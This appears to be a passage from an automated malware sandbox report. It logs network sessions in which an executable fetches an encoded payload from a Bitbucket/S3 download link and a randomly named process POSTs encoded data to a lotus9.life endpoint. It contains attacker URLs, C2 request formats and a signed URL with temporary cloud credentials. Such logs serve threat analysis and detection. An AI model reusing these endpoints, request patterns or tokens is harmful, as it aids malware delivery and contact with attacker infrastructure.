    Data Ascii: e</h1><p class="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-butt
Oct 23, 2024 07:04:04.448194981 CEST | 212 | IN | Data Raw: 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e 3c 73 74 72
    Data Ascii: b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-n
Oct 23, 2024 07:04:04.448203087 CEST | 1236 | IN | Data Raw: 6f 6e 65 22 3e d0 9d d0 b0 d0 b4 d1 91 d0 b6 d0 bd d1 8b d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 b1 d1 8b d1 81 d1 82 d1 80 d1 8b d0 b9 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f
    Data Ascii: one"> &nbsp;</p></div></div><ul class="b-parking__features"><li class="b-parking__features-item"><strong class="b-title b-parking__features-title"></strong><p class="b-text">&nbsp;
Oct 23, 2024 07:04:04.448317051 CEST | 1236 | IN | Data Raw: 20 3c 62 20 63 6c 61 73 73 3d 22 62 2d 70 72 69 63 65 5f 5f 61 6d 6f 75 6e 74 22 3e 38 33 26 6e 62 73 70 3b 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 72 2d 72 6f 75 62 6c 65 2d 6e 61 74 69 76 65 22 3e 26 23 38 33 38 31 3b 3c 2f 73 70 61 6e
    Data Ascii: <b class="b-price__amount">83&nbsp;<span class="char-rouble-native">&#8381;</span> </b><span class="l-margin_left-small">&nbsp;</span></p></div></div><div class="b-parking__promo-item b-parking__promo-item_type_hosting"><strong cl
Oct 23, 2024 07:04:04.448458910 CEST | 1236 | IN | Data Raw: b0 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 65 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 62 6c 6f 63 6b 20 62 2d 62 75 74 74 6f 6e 5f 73 69 7a
    Data Ascii: </p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/sozdanie-saita/"></a></div><div class="b-parking__promo-item b-parking__ssl-
Oct 23, 2024 07:04:04.448467970 CEST | 636 | IN | Data Raw: 81 d0 b8 d1 82 d0 b5 20 d0 b0 d0 b2 d1 82 d0 be d1 80 d0 b8 d1 82 d0 b5 d1 82 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 20 d1 81 d1 80 d0 b5 d0 b4 d0 b8 20 d0 bf d0 be d1 81 d0 b5 d1 82 d0 b8 d1 82 d0 b5 d0 bb d0 b5 d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 ba
    Data Ascii: &nbsp; &nbsp; SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')"
Oct 23, 2024 07:04:04.448476076 CEST | 1236 | IN | Data Raw: 69 66 20 28 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 3e 3d 20 30 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66
    Data Ascii: if ( links[ i ].href.indexOf('?') >= 0 ) { links[ i ].href = links[ i ].href + '&'; } else { links[ i ].href = links[ i ].href + '?'; }
Oct 23, 2024 07:04:04.448484898 CEST | 1146 | IN | Data Raw: 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 20 2f 5e 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20
    Data Ascii: ngth; i++) { if ( spans[ i ].className.match( /^puny/ ) ) { var text = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spans[ i ].c


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        17192.168.2.7596643.33.130.19080484C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Oct 23, 2024 07:04:09.794462919 CEST742OUTPOST /t67j/ HTTP/1.1
                                                                                                                                        Host: www.lotus9.life
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.lotus9.life
                                                                                                                                        Content-Length: 219
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.lotus9.life/t67j/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Ascii: fvM8Gh=HqYACbOsVoIg6TpKq5j8hMc9Kl2XGeFORPwy09mbWk474dtnZe2Zc/HIUcnhlBLGWIvZQydkeu3xUaLhMqTkCsDkXDBpUs0NH2DdgTRQopCGKVnvTrUpUfTfP3ruSVDIjjX9arsHHtc78XKMvmHj1xt8Iu/HrttjHr1W5IMkwB7tZ0CcNnqjwjjWWfxOCw1ekOLUtF+sYcK7X6WQCg==


Session ID: 18 | Source IP: 192.168.2.7 | Source Port: 59665 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 484 | Process: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
Timestamp: Oct 23, 2024 07:04:12.339335918 CEST | Bytes transferred: 762 | Direction: OUT
Data:
POST /t67j/ HTTP/1.1
                                                                                                                                        Host: www.lotus9.life
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.lotus9.life
                                                                                                                                        Content-Length: 239
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.lotus9.life/t67j/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Ascii: fvM8Gh=HqYACbOsVoIg8wxKn4j8oMcyAF2XUeFKRP0y08SLWRQ7/4RnYcOZZ/HIAMnkrhKKWIqmQzxkeujxUYThMd/rBcDmYjBrQs0NH2DdgTUHoqyGKG/vVPA2SvTcfHruWVDMjjWaapIpHv078W6MvVfs7xt6We+F4+AVCrVLwIY/0RP3cCf+XFmPuybtSdV4VWormPPMgnKNHrvRao3UUQEOWZtL32U8HAdYz3pTGfM=


Session ID: 19 | Source IP: 192.168.2.7 | Source Port: 59666 | Destination IP: 3.33.130.190 | Destination Port: 80
Timestamp: Oct 23, 2024 07:04:15.567982912 CEST | Bytes transferred: 1775 | Direction: OUT
Data:
POST /t67j/ HTTP/1.1
                                                                                                                                        Host: www.lotus9.life
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.lotus9.life
                                                                                                                                        Content-Length: 1251
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.lotus9.life/t67j/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 48 71 59 41 43 62 4f 73 56 6f 49 67 38 77 78 4b 6e 34 6a 38 6f 4d 63 79 41 46 32 58 55 65 46 4b 52 50 30 79 30 38 53 4c 57 58 49 37 34 4b 4a 6e 61 39 4f 5a 65 2f 48 49 44 4d 6e 6c 72 68 4b 48 57 4a 4f 69 51 7a 74 30 65 73 62 78 53 37 62 68 45 50 48 72 61 4d 44 6d 54 44 42 71 55 73 30 69 48 32 54 52 67 54 6b 48 6f 71 79 47 4b 41 37 76 53 62 55 32 4a 76 54 66 50 33 72 63 53 56 43 54 6a 69 2f 6c 61 70 4d 58 47 65 55 37 38 32 71 4d 38 57 37 73 7a 78 74 34 58 65 2b 6e 34 2b 4d 47 43 6f 68 74 77 4c 45 5a 30 57 37 33 63 48 43 68 51 6b 4b 66 35 7a 50 69 51 63 46 32 53 57 46 44 6f 2f 53 78 70 6b 32 66 47 37 4c 77 55 49 4c 36 5a 46 77 49 4d 2f 4d 34 38 58 6f 50 44 33 38 52 6e 56 46 46 62 62 41 53 6f 33 65 7a 54 45 52 58 49 4f 2b 68 76 73 73 72 4a 2f 58 79 43 77 4e 49 69 45 46 33 68 55 64 68 5a 64 65 76 44 46 62 72 32 30 34 59 64 48 76 4b 52 36 2b 49 76 2f 63 4b 2b 6a 2f 77 54 66 4b 7a 6a 36 6e 45 53 52 32 39 46 48 70 56 50 42 43 4c 47 55 4a 49 37 57 6c 56 4f 61 38 4d 72 6b 72 56 62 50 38 [TRUNCATED]


Session ID: 20 | Source IP: 192.168.2.7 | Source Port: 59667 | Destination IP: 3.33.130.190 | Destination Port: 80
Timestamp: Oct 23, 2024 07:04:18.113260984 CEST | Bytes transferred: 484 | Direction: OUT
Data:
GET /t67j/?fvM8Gh=KowgBu3DXf0G7hBLtaH8s8ZzKm+VG/tpKZ1Q7eDBR0ArwNxjdNGLI+rTTcfRvEyEYs27WEZYXeTRVuyNENDuSquLWx1vE6gNEX6tkQ0IxcS5dAyUTa1RZ/bXBmbIS1WdqDLnMr1sBa9m&DfDx=AFrxfzcH-Ld HTTP/1.1
                                                                                                                                        Host: www.lotus9.life
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Connection: close
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Timestamp: Oct 23, 2024 07:04:18.771471977 CEST | Bytes transferred: 419 | Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                                                                        Server: openresty
                                                                                                                                        Date: Wed, 23 Oct 2024 05:04:18 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 279
                                                                                                                                        Connection: close
                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fvM8Gh=KowgBu3DXf0G7hBLtaH8s8ZzKm+VG/tpKZ1Q7eDBR0ArwNxjdNGLI+rTTcfRvEyEYs27WEZYXeTRVuyNENDuSquLWx1vE6gNEX6tkQ0IxcS5dAyUTa1RZ/bXBmbIS1WdqDLnMr1sBa9m&DfDx=AFrxfzcH-Ld"}</script></head></html>


Session ID: 0 | Source IP: 192.168.2.7 | Source Port: 49700 | Destination IP: 185.166.143.48 | Destination Port: 443 | PID: 6452 | Process: C:\Users\user\Desktop\z10982283782.exe
Timestamp: 2024-10-23 05:02:10 UTC | Bytes transferred: 187 | Direction: OUT
Data:
GET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                        Host: bitbucket.org
Timestamp: 2024-10-23 05:02:11 UTC | Bytes transferred: 5171 | Direction: IN
Data:
HTTP/1.1 302 Found
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:10 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Content-Length: 0
                                                                                                                                        Server: AtlassianEdge
                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX [TRUNCATED]
                                                                                                                                        Expires: Wed, 23 Oct 2024 05:02:10 GMT
                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                        X-Used-Mesh: False
                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                        Content-Language: en
                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                        X-Served-By: c14a22a3cd72
                                                                                                                                        X-Version: 4bc3453affe5
                                                                                                                                        X-Static-Version: 4bc3453affe5
                                                                                                                                        X-Request-Count: 2604
                                                                                                                                        X-Render-Time: 0.04558157920837402
                                                                                                                                        X-B3-Traceid: d85e515e909142ad9964c861258da2ea
                                                                                                                                        X-B3-Spanid: bef8bd19de60bfbe
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        Content-Security-Policy: base-uri 'self'; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian. [TRUNCATED]
                                                                                                                                        X-Usage-Quota-Remaining: 999069.913
                                                                                                                                        X-Usage-Request-Cost: 943.40
                                                                                                                                        X-Usage-User-Time: 0.023097
                                                                                                                                        X-Usage-System-Time: 0.005205
                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                        Age: 0
                                                                                                                                        X-Cache: MISS
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                        Atl-Traceid: d85e515e909142ad9964c861258da2ea
                                                                                                                                        Atl-Request-Id: d85e515e-9091-42ad-9964-c861258da2ea
                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                        Server-Timing: atl-edge;dur=155,atl-edge-internal;dur=3,atl-edge-upstream;dur=153,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                        Connection: close


Session ID: 1 | Source IP: 192.168.2.7 | Source Port: 49701 | Destination IP: 3.5.3.65 | Destination Port: 443 | PID: 6452 | Process: C:\Users\user\Desktop\z10982283782.exe
Timestamp: 2024-10-23 05:02:11 UTC | Bytes transferred: 1295 | Direction: OUT
Data:
GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX0TejNIhed6dqnVS8HwylTQKvAyrfpMWEXQYcoRuCgC5H [TRUNCATED]
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
Timestamp: 2024-10-23 05:02:11 UTC | Bytes transferred: 564 | Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                                                                        x-amz-id-2: a+6/7NBfmAlWkTUCbl5L0tLo4RpXpylx49dKdhuo6+4Q5Og9MfOkAMotL/wUhfU56A9tFCcGYVEx/uPIPiA9jl/WHUCm3DL0
                                                                                                                                        x-amz-request-id: SRJDQ19JASGF73X4
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:12 GMT
                                                                                                                                        Last-Modified: Tue, 22 Oct 2024 05:16:04 GMT
                                                                                                                                        ETag: "5d7ab335987101c49bbbe6ebcea19843"
                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                        x-amz-version-id: aV2sZzfG3ESjVStuXavykQrQq1UCdUQQ
                                                                                                                                        Content-Disposition: attachment; filename="233_Ltspwqrtysw"
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        Server: AmazonS3
                                                                                                                                        Content-Length: 383200
                                                                                                                                        Connection: close
                                                                                                                                        Data Ascii: rGcndTH/Q9hRYrmh6O04MDdoLHDqMx5vOoUDksyQgiJVKUd+Xq/RpAnTZ36IO4CweoHS+rgZlf5R39N4BNkKTiJ3Kx4z+f77eQjSl18MwqtS1MbaOJnxXlZlVyZNn9mIO7bKj85VNGbeQ7OZ3PJb9EVneAsGFPcicZBmfprczuyhK0QVwg1xcH3S3tlJlC3Dzy4T1l4piXErZYzN/B9+Q0WuvBzQH12wzyL5NqFGk3IQ7xanxO3UxhmvSLOHnfy
                                                                                                                                        2024-10-23 05:02:12 UTC1024INData Raw: 73 68 66 62 6a 49 4e 78 30 48 62 62 4a 7a 4c 59 6d 2b 32 37 54 79 2b 73 56 4b 4a 76 41 44 57 36 76 6f 70 72 44 4a 79 7a 41 38 58 4a 4b 71 67 6e 55 69 73 52 6a 2f 79 76 58 65 6f 4d 4a 63 77 68 2f 65 35 48 61 2f 42 72 7a 47 6f 69 43 52 32 74 2b 61 74 78 56 52 31 59 32 65 6c 50 51 74 70 41 4c 56 53 75 32 63 37 31 6b 4b 6c 66 49 6c 48 47 72 71 67 63 4a 67 39 37 4b 4f 41 72 4e 74 77 32 48 61 65 4f 43 31 67 42 65 45 4b 52 46 6c 37 71 68 52 43 52 30 79 58 38 68 77 77 6c 56 6e 64 61 46 73 70 79 7a 75 61 43 69 50 59 56 65 45 2f 72 53 5a 64 42 30 41 4a 46 33 48 76 54 4d 2b 44 77 42 6c 4d 57 49 48 35 50 59 6b 36 79 41 74 37 73 65 52 51 56 2f 63 46 79 30 78 30 45 50 6a 61 49 2b 67 72 64 6c 70 7a 77 6a 33 79 67 54 4a 67 7a 2b 36 76 33 43 31 71 50 50 39 46 6d 53 56 43
                                                                                                                                        Data Ascii: shfbjINx0HbbJzLYm+27Ty+sVKJvADW6voprDJyzA8XJKqgnUisRj/yvXeoMJcwh/e5Ha/BrzGoiCR2t+atxVR1Y2elPQtpALVSu2c71kKlfIlHGrqgcJg97KOArNtw2HaeOC1gBeEKRFl7qhRCR0yX8hwwlVndaFspyzuaCiPYVeE/rSZdB0AJF3HvTM+DwBlMWIH5PYk6yAt7seRQV/cFy0x0EPjaI+grdlpzwj3ygTJgz+6v3C1qPP9FmSVC
                                                                                                                                        2024-10-23 05:02:12 UTC11208INData Raw: 53 46 72 48 49 79 41 76 6f 57 65 70 44 2f 79 37 42 72 74 37 4d 4d 64 43 76 79 4c 50 69 6b 50 31 57 59 42 6a 35 59 53 59 64 79 68 69 4c 39 65 32 31 69 37 6b 53 37 70 76 34 4e 36 50 57 52 6f 74 56 2f 65 6e 52 48 50 50 54 35 38 49 46 31 69 5a 62 44 74 48 35 73 68 79 57 79 74 4b 35 64 4e 68 38 57 31 42 69 57 53 71 71 47 6c 52 37 45 4e 59 6e 4b 58 52 58 55 43 76 73 4f 46 55 4e 35 63 5a 7a 45 75 74 61 47 48 6c 74 50 47 52 38 34 65 62 34 6f 70 70 5a 6f 50 76 53 6c 73 62 58 31 4f 2f 4d 46 62 37 2b 2f 56 2b 6f 76 48 47 30 38 6f 4c 41 72 5a 70 4c 56 4a 43 79 37 44 50 41 71 70 4c 4c 61 6c 5a 36 49 59 4b 53 2b 64 64 4d 71 4d 75 30 6d 2b 73 43 4f 53 45 49 57 68 78 61 4a 4c 50 6b 56 2b 79 78 65 61 42 63 74 79 31 43 66 2b 34 6c 31 56 67 53 4a 4c 72 70 75 75 46 6b 64 46
                                                                                                                                        Data Ascii: SFrHIyAvoWepD/y7Brt7MMdCvyLPikP1WYBj5YSYdyhiL9e21i7kS7pv4N6PWRotV/enRHPPT58IF1iZbDtH5shyWytK5dNh8W1BiWSqqGlR7ENYnKXRXUCvsOFUN5cZzEutaGHltPGR84eb4oppZoPvSlsbX1O/MFb7+/V+ovHG08oLArZpLVJCy7DPAqpLLalZ6IYKS+ddMqMu0m+sCOSEIWhxaJLPkV+yxeaBcty1Cf+4l1VgSJLrpuuFkdF
                                                                                                                                        2024-10-23 05:02:12 UTC16384INData Raw: 30 2b 6f 4b 35 6a 53 33 7a 78 4e 50 61 50 30 32 76 74 6e 69 36 50 48 58 32 56 55 61 6a 73 4e 69 63 69 59 66 6d 68 54 33 6f 4f 63 2b 4e 51 6c 64 7a 50 4d 73 47 5a 56 38 78 68 74 31 56 75 6c 5a 4b 46 72 39 36 77 41 64 69 4a 38 48 62 45 38 64 4b 4e 78 6e 52 38 77 62 43 46 44 35 6b 31 54 49 43 73 35 38 67 48 74 47 4e 48 68 47 53 72 6b 59 50 73 4b 52 79 46 42 78 58 4b 34 4d 39 75 5a 2f 4d 73 6a 54 46 6b 30 45 42 6e 45 67 64 53 61 69 66 74 49 6f 4b 42 65 74 64 43 38 38 45 61 70 6c 66 65 34 57 4a 55 42 78 32 41 50 39 35 66 63 55 6b 79 2f 6c 43 56 6f 6c 36 35 55 33 63 43 74 70 2f 47 6d 4b 4d 49 74 77 33 34 37 68 4d 42 48 43 52 70 31 53 57 77 58 68 35 76 76 63 79 37 70 36 76 74 4d 37 79 65 42 2f 6f 65 39 71 37 42 47 37 37 31 5a 65 62 52 46 6f 4b 62 42 56 46 65 4a
                                                                                                                                        Data Ascii: 0+oK5jS3zxNPaP02vtni6PHX2VUajsNiciYfmhT3oOc+NQldzPMsGZV8xht1VulZKFr96wAdiJ8HbE8dKNxnR8wbCFD5k1TICs58gHtGNHhGSrkYPsKRyFBxXK4M9uZ/MsjTFk0EBnEgdSaiftIoKBetdC88Eaplfe4WJUBx2AP95fcUky/lCVol65U3cCtp/GmKMItw347hMBHCRp1SWwXh5vvcy7p6vtM7yeB/oe9q7BG771ZebRFoKbBVFeJ
                                                                                                                                        2024-10-23 05:02:12 UTC1024INData Raw: 4a 4f 41 4f 50 2f 4c 36 43 58 77 50 34 34 54 64 77 79 6c 4b 70 2b 4a 49 55 37 51 46 57 43 70 6c 4b 49 66 52 57 46 65 4f 2b 73 2f 4a 73 33 64 35 61 6d 63 37 4e 2f 65 45 72 6e 32 45 4d 77 54 2f 6f 6f 6a 39 67 6f 4c 61 75 55 74 64 49 69 70 6b 42 54 58 53 6b 57 61 39 50 56 67 4d 2f 74 49 32 41 30 34 54 36 71 32 53 4b 6c 61 48 6b 5a 55 58 43 70 35 44 48 57 41 44 2b 33 69 64 57 47 61 2b 4d 37 58 6f 6c 63 52 34 54 73 38 71 34 38 6c 30 71 44 5a 52 49 4e 38 78 4b 34 4f 4a 51 6b 68 34 4b 67 2f 6b 74 48 55 4b 77 34 79 44 6b 44 6d 46 6a 71 59 52 56 2b 7a 47 4a 43 4e 2b 66 6d 6f 42 44 4c 34 33 35 6e 37 4b 39 44 62 6b 30 68 66 4f 64 30 6d 43 2b 68 53 49 33 4a 32 4e 51 51 4a 4b 34 30 68 51 35 76 55 33 36 76 69 63 4d 59 4e 2f 55 74 4e 30 72 36 64 54 64 37 57 62 56 46 45
                                                                                                                                        Data Ascii: JOAOP/L6CXwP44TdwylKp+JIU7QFWCplKIfRWFeO+s/Js3d5amc7N/eErn2EMwT/ooj9goLauUtdIipkBTXSkWa9PVgM/tI2A04T6q2SKlaHkZUXCp5DHWAD+3idWGa+M7XolcR4Ts8q48l0qDZRIN8xK4OJQkh4Kg/ktHUKw4yDkDmFjqYRV+zGJCN+fmoBDL435n7K9Dbk0hfOd0mC+hSI3J2NQQJK40hQ5vU36vicMYN/UtN0r6dTd7WbVFE
